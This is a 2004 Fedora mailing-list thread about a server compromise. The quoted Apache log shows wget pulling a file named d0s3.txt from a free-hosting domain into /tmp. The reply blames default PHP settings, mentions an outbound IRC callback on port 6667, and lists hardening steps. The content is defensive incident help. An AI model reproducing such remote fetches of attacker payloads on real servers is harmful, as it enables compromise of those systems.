OT. Have I been hacked? IRCD?
Chris Stark
cstark at hawaii.edu
Tue Dec 14 05:26:34 UTC 2004
mark at onnow.net wrote:
> I found d0s3.txt in my /tmp dir.
>
> Not sure how it got there. Found this too:
>
> Here is the log file from error_log.1
>
> --19:21:21-- http://@#!@#!@#!@#!yeah.freesuperhost.com/d0s3.txt
> => `d0s3.txt'
> Resolving @#!@#!@#!@#!yeah.freesuperhost.com... done.
> Connecting to @#!@#!@#!@#!yeah.freesuperhost.com[70.84.229.131]:80...
> connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 20,419 [text/plain]
>
> 0K .......... ......... 100% 74.68 KB/s
>
> 19:21:23 (74.68 KB/s) - `d0s3.txt' saved [20419/20419]
>
> Not quite sure how this happened
>
> Mark
>
Greetings,
I had the same thing happen. It seems that the vulnerability is due to
crappy settings in the default install of PHP. Here's a few things to
help prevent it...
1) Write your own custom iptables rules that tightly restrict BOTH
incoming and outgoing traffic. Although ports 80 & 443 were open on my
server, it wouldn't allow the outgoing connections back to the
attacker's control point because it used 6667 which was not explicitly
allowed.
2) Change the default upload and session directories for PHP (or turn
uploads off if you don't need them)
3) Run PHP in safe mode
4) turn off the ability to include remote files in PHP
5) disable functions like exec, popen, and passthru
Since making these adjustments, I haven't had any further issues with
this particular attack. I'm surprised there hasn't been more noise made
over this one.
Aloha,
Chris
More information about the fedora-list
mailing list